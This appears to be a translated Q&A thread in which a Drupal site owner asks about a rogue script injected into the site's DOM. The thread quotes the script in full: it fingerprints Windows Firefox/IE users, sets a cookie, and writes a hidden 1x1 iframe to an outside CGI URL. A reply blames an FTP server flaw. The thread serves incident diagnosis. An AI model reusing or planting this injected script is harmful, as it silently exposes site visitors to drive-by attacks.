6

重複の可能性:
私のWebサイトのDOMに表示される奇妙なスクリプト

ウェブサイトのDOMで奇妙なスクリプトが実行されていることに気づきました。DRUPALを実行しています。スクリプトはhttp://www.103fm.net/release.jsです。この不正なスクリプトをどこから探し始めるかわかりません。私のウェブサイトはmiloads.comで、管理メニューでのみ発生します。奇妙なことに、ファイルは103fm.netに存在しませんが、実際には次のスクリプトが読み込まれます。

var BrowserDetect = {
init: function() {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function(data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function(dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [{
string: navigator.userAgent,
subString: "Firefox",
identity: "Firefox"
}, {
string: navigator.userAgent,
subString: "MSIE",
identity: "Explorer",
versionSearch: "MSIE"
}],
dataOS: [{
string: navigator.platform,
subString: "Win",
identity: "Windows"
}]
};
function addCookie(szName, szValue, dtDaysExpires) {
var dtExpires = new Date();
var dtExpiryDate = "";
dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000);
dtExpiryDate = dtExpires.toGMTString();
document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate;
}
function findCookie(szName) {
var i = 0;
var nStartPosition = 0;
var nEndPosition = 0;
var szCookieString = document.cookie;
while (i <= szCookieString.length) {
nStartPosition = i;
nEndPosition = nStartPosition + szName.length;
if (szCookieString.substring(nStartPosition, nEndPosition) == szName) {
nStartPosition = nEndPosition + 1;
nEndPosition = document.cookie.indexOf(";", nStartPosition);
if (nEndPosition < nStartPosition)
nEndPosition = document.cookie.length;
return document.cookie.substring(nStartPosition, nEndPosition);
break;
}
i++;
}
return "";
}
BrowserDetect.init();
var szCookieString = document.cookie;
var stopit = BrowserDetect.browser;
var os = BrowserDetect.OS;
if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) {
addCookie("geo_id2", "753445", 1);
document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>");
} else {}
4

1 に答える 1

1

同様に、クライアントのサーバーは昨夜、ルーマニア、チェコ共和国、ポーランドの IP アドレスによって侵害されました。これらの一見自動化されたプロセスは、body タグの先頭に script タグを挿入しているように見えます。このスクリプトは、Firefox および IE を実行している Windows マシンで Cookie を生成するようです。次に、iframe を開き、ロシアでホストされているサイトで実行されている CGI スクリプトを実行します。

幸いなことに、最新バージョンの Firefox ではスクリプトをロードすることさえできません。ただし、IEはそうです。

Chrome では (影響を受けていないにもかかわらず)、この問題が発生したページにアクセスすることさえできません。

これについて私が見つけたすべてのレポートは最近発生したものであり、パスワードの侵害ではなく、ソフトウェアの脆弱性である可能性が非常に高いです - どの FTP サーバーを実行しているか (FTP クライアントでサーバーに接続すると、コンソールに表示されるはずです)。問題のサーバーは ProFTPd 1.3.1 を実行しています。

ソフトウェアが一般的である場合は、作成者に通知する必要があります。

于 2012-04-20T11:31:08.880 に答える